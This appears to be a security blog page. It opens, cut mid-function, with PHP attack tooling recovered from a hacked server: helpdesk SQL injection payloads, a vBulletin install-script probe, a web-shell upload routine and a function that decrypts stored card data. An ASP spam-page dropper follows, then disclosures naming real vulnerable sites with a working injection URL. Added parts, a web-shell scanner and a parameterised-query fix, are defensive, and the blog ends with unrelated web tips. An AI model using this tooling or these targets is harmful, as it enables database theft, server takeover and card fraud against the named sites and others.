$url = str_replace("/admin","",$url);
$post = "tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,($injection),0,0,0,0,0,0,0,0,0,0,0#";
$curl_connection = curl_init($url);
if($curl_connection != false) {
curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 30);
curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $post);
$source = curl_exec($curl_connection);
preg_match_all('/:::::(.*?)::::/s',$source,$infoz);
if($infoz[0]) {
return $infoz[0];
}else{
return "Fail!";
}
}else{
return "Fail!";
}
}

function get_base_dir($URL) {
$URL = str_replace("http://","",$URL);
$URL = str_replace("https://","",$URL);
$parts = explode('/',$URL);
$newURL = "http://";
for ($i = 0; $i < count($parts); $i++) {
if(strpos($parts[$i],'.php') == false)
$newURL .= $parts[$i] . "/";
}
return $newURL;
}
 
function vb_vuln($URL) {
$URL = str_replace("http://","",$URL);
$URL = str_replace("https://","",$URL);
$URL = str_replace(".php","",$URL);
$xURL = explode("/",$URL);
$count = 0;
foreach ($xURL as $dir) {
if($count != 0)
$URL = $URL . $dir . "/";
else $URL = $dir;
$source = "";
$arr = parse_url('http://' . $URL);
if(strpos($URL, '?')) return 'EOF';
if(substr($URL, -1, 1) != '/') $URL = $URL . '/';
if(!$arr['scheme']) $URL = 'http://' . $URL;
$headers = get_headers('http://' . str_replace("//","/",$URL . '/install/upgrade.php'));
if(substr($headers[0], 9, 3) == '200') {
$source = file_get_contents('http://' . str_replace("//","/",$URL . '/install/upgrade.php'));
GLOBAL $victimURL;
$victimURL = $URL . "/install/upgrade.php";
if(strpos($source,'Begin Upgrade') != false)
return "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx";
}
elseif($headers = get_headers('http://' . str_replace("//","/",$URL . '/core/install/upgrade.php'))) {
if((substr($headers[0], 9, 3) == '200' || substr($headers[0], 9, 3) == '302') && substr($headers[7], 9, 3) != '404') {
$source = file_get_contents('http://' . str_replace("//","/",$URL . '/core/install/upgrade.php'));
GLOBAL $victimURL;
$victimURL = $URL . "/core/install/upgrade.php";
if(strpos($source,'Begin Upgrade') != false)
return "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx";
}
}
$hash ="";
preg_match_all('|var CUSTNUMBER = "(.*?)";|', $source, $res);
foreach ($res[1] as $hash) {
if(strlen($hash) == 32)
return $hash;
}
preg_match_all('|var CUSTNUMBER="(.*?)";|', $source, $res);
foreach ($res[1] as $hash) {
if(strlen($hash) == 32)
return $hash;
}
$count++;
}
}

function check_injection($url){
$data = http_get( str_replace("=", "='", $url) );
$errors = implode("|", $GLOBALS['error']);
return preg_match("#{$errors}#i", $data);
}

function req($url,$fields){
$opts = array(
CURLOPT_HEADER =>1,
CURLOPT_RETURNTRANSFER => 1,
CURLOPT_URL => 'http://www.sms-online.web.id/'.$url,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => $fields,
);
$ch=curl_init();
curl_setopt_array($ch,$opts);
$result = curl_exec($ch);
curl_close($ch);
return $result;
}

function fc_vuln($url) {
$shell = dirname($url) . '/temp/ganteng.php';
$url = dirname($url) . '/upload.php';
$postFields = array();
$filePath = "/home/cpdebx/public_html/fc/ganteng.php";
$postFields['file'] = "@$filePath";
$curl_handle = curl_init();
curl_setopt($curl_handle, CURLOPT_URL, $url);
curl_setopt($curl_handle, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl_handle, CURLOPT_POST, true);
curl_setopt($curl_handle, CURLOPT_POSTFIELDS, $postFields);
$result = curl_exec($curl_handle);
curl_close($curl_handle);
if(strpos($result,"@ganteng.php") != false)
return $shell;
else
return "Fail!";
}

function inject($url,$anu){
$url = dirname($url) . '/viewticket.php';
$url = str_replace("/admin","",$url);
$post = "tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,($anu),0,0,0,0,0,0,0,0,0,0,0#";
$curl_connection = curl_init($url);
if($curl_connection != false) {
curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 30);
curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $post);
$source = curl_exec($curl_connection);
preg_match_all('/:::::(.*?)::::/s',$source,$infoz);
if($infoz[0]) {
return $infoz[0];
}else{
return "Fail!";
}
}else{
return "Fail!";
}
}

function dec($string,$cc_encryption_hash){
$key = md5(md5($cc_encryption_hash)) . md5($cc_encryption_hash);
$hash_key = _hash($key);
$hash_length = strlen($hash_key);
$string = base64_decode($string);
$tmp_iv = substr($string,0,$hash_length);
$string = substr($string,$hash_length,strlen ($string) - $hash_length);
$iv = $out = '';
$c = 0;
while ($c < $hash_length){
$iv .= chr(ord($tmp_iv[$c]) ^ ord($hash_key[$c]));
++$c;
}
$key = $iv;
$c = 0;
while ($c < strlen($string)){
if(($c != 0 AND $c % $hash_length == 0)){
$key = _hash($key . substr($out,$c - $hash_length,$hash_length));
}
$out .= chr(ord($key[$c % $hash_length]) ^ ord ($string[$c]));
++$c;
}
return $out;
}
function _hash($string){
$hash = (function_exists('sha1')) ? sha1($string):md5($string);
$out = '';
$c = 0;
while ($c < strlen($hash)){
$out .= chr(hexdec($hash[$c] .$hash[$c + 1]));
$c += 2;
}
return $out;
}
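
For cleanup after a compromise like this one, a small scanner can flag PHP files that combine several traits visible in the shell above. This is an added example, not part of the recovered shell: the trait names, the regular expressions, the threshold of three and the function names are assumptions derived from this one sample, and both demo files are constructed.

```php
<?php
declare(strict_types=1);

// Traits taken from the shell shown above. Each one alone also occurs in
// legitimate code, so a file is reported only when several appear together.
const SHELL_TRAITS = [
    // Answers 404 when the User-Agent looks like a crawler.
    'hides_from_crawlers' => '~\$_SERVER\s*\[\s*[\'"]HTTP_USER_AGENT[\'"]\s*\].{0,200}?404 Not Found~is',
    // Login gate comparing md5() of a posted password.
    'md5_password_gate'   => '~md5\s*\(\s*\$_POST\s*\[\s*[\'"]pass(word)?[\'"]\s*\]\s*\)~i',
    // Removes the time limit and silences all errors.
    'no_limits_no_errors' => '~set_time_limit\s*\(\s*0\s*\).{0,200}?error_reporting\s*\(\s*0\s*\)~is',
    // Outbound cURL requests with certificate verification switched off.
    'tls_check_disabled'  => '~CURLOPT_SSL_VERIFYPEER\s*,\s*(false|0)\b~i',
    // A literal UNION SELECT with a run of column placeholders inside the source.
    'union_select_string' => '~union\s+select\s+[\d,\s]{10,}~i',
];

// Return the names of all traits found in one source string.
function webshell_traits(string $source): array
{
    $found = [];
    foreach (SHELL_TRAITS as $name => $regex) {
        if (preg_match($regex, $source) === 1) {
            $found[] = $name;
        }
    }
    return $found;
}

// Walk a directory tree and report PHP files with at least $threshold traits.
function scan_tree(string $dir, int $threshold = 3): array
{
    $hits = [];
    $files = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($files as $file) {
        if (!$file->isFile() || !$file->isReadable()
            || preg_match('~\.(php\d?|phtml|inc)$~i', $file->getFilename()) !== 1) {
            continue;
        }
        // Read at most 2 MB per file; the traits sit near the top of the shell.
        $source = file_get_contents($file->getPathname(), false, null, 0, 2097152);
        if ($source === false) {
            continue;
        }
        $traits = webshell_traits($source);
        if (count($traits) >= $threshold) {
            $hits[$file->getPathname()] = $traits;
        }
    }
    ksort($hits);
    return $hits;
}

// Constructed demo files: one ordinary script and one carrying the traits above.
$benign = <<<'SRC'
<?php
error_reporting(E_ALL);
$stmt = $pdo->prepare('SELECT id FROM users WHERE name = ?');
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, true);
SRC;

$shellLike = <<<'SRC'
<?php
if (strpos($_SERVER['HTTP_USER_AGENT'], 'Google') !== false) { header('HTTP/1.0 404 Not Found'); exit; }
if (md5($_POST['pass']) == $auth_pass) { $_SESSION['ok'] = true; }
set_time_limit(0);
error_reporting(0);
curl_setopt($c, CURLOPT_SSL_VERIFYPEER, false);
$post = "tid[value]=-1 union select 1,0,0,0,0,0,0";
SRC;

$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'scan_' . bin2hex(random_bytes(4));
mkdir($dir, 0700, true);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'config.php', $benign);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'cache.php', $shellLike);

foreach (scan_tree($dir) as $path => $traits) {
    printf("%s: %s\n", basename($path), implode(', ', $traits));
}

// Remove the demo files again.
unlink($dir . DIRECTORY_SEPARATOR . 'config.php');
unlink($dir . DIRECTORY_SEPARATOR . 'cache.php');
rmdir($dir);
```

The demo reports only cache.php, with all five traits; point scan_tree() at a web root to review real files, and treat hits as candidates for manual inspection.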

useless asp stuff found on an hacked server

<%
if request.QueryString("1")<>2 then
response.Write "<iframe src=""http://127.0.0.1"" width=100% height=100% frameborder=0></iframe>"
response.End()
end if
%>
<%
if request.Form("c")<>"" then
randomize
shuliang=Int((10000000 - 1 + 10000000) * Rnd + 1)
title=Replace(request.Form("title")," ","-")
path1=replace(server.mappath("1.asp"),"1.asp","")
path=path1&title&"-"&shuliang&".html"
dbfile=path1&"1.htm"
response.Write path&"<br>"
response.Write dbfile&"<br>"
str1=Replace(request.Form("c"),"<br><","<")&"</body></html>"
str2="<a href="&title&"-"&shuliang&".html"">"&request.Form("title")&"</a>"
response.Write str1&"<br>"
response.Write str2&"<br>"
set myfso = Server.CreateObject("Scripting.FileSystemObject")
set myfile1 = myfso.CreateTextFile(path,true)
set myfile2 = myfso.CreateTextFile(dbfile,true)
        myfile1.WriteLine(str1)
        myfile1.close
            myfile2.WriteLine(str2)
        myfile2.close
        set myfso = nothing

response.Write "<font color=red>Good Luck!</font>"
end if
%>
<title>MS</title>
SD
<form action="" method="post">
  <input type="text" size=48 name="title" value='' />
  <input type="submit" id="b" value="J8"><br>
<textarea name="c" cols=60 rows=9></textarea>
</form>
<p></p>

Friday, 17 July 2015

http://www.lcsoftware.com/ | sql injection, xss, system compromise

sample:

http://www.lcsoftware.com/lcss-modules/listings/PublicListingController.php?Action=def&id=11%277&statusFilter=40&pageSize=5&pos=0

error:
Failed to execute query:
select listing_id, TITLE, ADDRESS, CITY, ZIP, STATE, PRICE, DESCRIPTION, TYPE_ID, BEDS, BATHS, FLOORS, SQUARE_FEET, LOT_SIZE, GARAGE_SIZE, YEAR_BUILD, ANNUAL_PROPERTY_TAX, STATUS_ID, HOME_FEATURES, COMMUNITY_FEATURES, MLS, USER_ID, CREATED, RANK, IS_FEATURE_LISTING from LCSS_LISTING WHERE USER_ID='11'7' ORDER BY STATUS_ID, PRICE ASC LIMIT 0, 5
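
The error above shows the `id` value from the URL landing inside the quoted `USER_ID` literal, and the failed SQL being echoed back to the visitor. The following is an added example, not code from the original post or from the vendor: a hypothetical `fetchListings()` helper that binds the value as a parameter and keeps the database error in the server log, using a constructed in-memory SQLite table with a reduced column set in place of the real database.

```php
<?php
// Added example: the schema, the rows and fetchListings() are constructed
// for illustration; they are assumptions, not the application's real code.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE LCSS_LISTING (listing_id INTEGER, TITLE TEXT,
           PRICE INTEGER, STATUS_ID INTEGER, USER_ID TEXT)");
$db->exec("INSERT INTO LCSS_LISTING VALUES
           (1, 'Sample house', 100000, 40, '11'),
           (2, 'Other house', 90000, 40, '12')");

function fetchListings(PDO $db, string $userId, $pos, $pageSize): array
{
    // Paging values must be integers in a sane range; reject anything else.
    $pos = filter_var($pos, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 0]]);
    $pageSize = filter_var($pageSize, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1, 'max_range' => 100]]);
    if ($pos === false || $pageSize === false) {
        throw new InvalidArgumentException('invalid paging parameters');
    }

    try {
        // The user id travels as a bound value, never as part of the SQL text.
        $stmt = $db->prepare(
            'SELECT listing_id, TITLE, PRICE FROM LCSS_LISTING
             WHERE USER_ID = :uid
             ORDER BY STATUS_ID, PRICE ASC LIMIT :pos, :size'
        );
        $stmt->bindValue(':uid', $userId, PDO::PARAM_STR);
        $stmt->bindValue(':pos', $pos, PDO::PARAM_INT);
        $stmt->bindValue(':size', $pageSize, PDO::PARAM_INT);
        $stmt->execute();
        return $stmt->fetchAll(PDO::FETCH_ASSOC);
    } catch (PDOException $e) {
        // Keep the query and driver message server-side only.
        error_log('listing query failed: ' . $e->getMessage());
        throw new RuntimeException('Unable to load listings.');
    }
}

// A normal id, then the value taken from the sample URL in the post.
var_dump(count(fetchListings($db, '11', 0, 5)));
var_dump(count(fetchListings($db, "11'7", 0, 5)));
```

Called with the `11'7` value from the sample URL, the helper compares it as plain data and returns no rows instead of a SQL error.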

Tuesday, 7 July 2015

Fix placeholders on all browsers - Internet Explorer, Firefox, Windows, Linux, Mac

Go to http://jamesallardice.github.io/Placeholders.js/
and download the latest placeholders.min.js

Just add

<script language="javascript" type="text/javascript" src="images/placeholders.min.js"></script>
to your code and the placeholders will work on all browsers with JS support.



Monday, 22 June 2015

http://www.timmymobile.com | SQL Injection, data leakage


 
E:\My work\Myprobject\天米\Meters\
   DAL.AllSelect.GetList(String tableName, String where)
E:\My work\Myprobject\天米\Meters\DAL\AllSelect.cs
 
A generic error is returned if we try simple (possible?) SQL injections.
 
The scripts are really simple to circumvent. 

Sunday, 21 June 2015

Sitemap xml url rewrite rule


An example could be something like this, where our script is sitemap.php:
RewriteRule ^sitemap\.xml$ /sitemap.php [L]
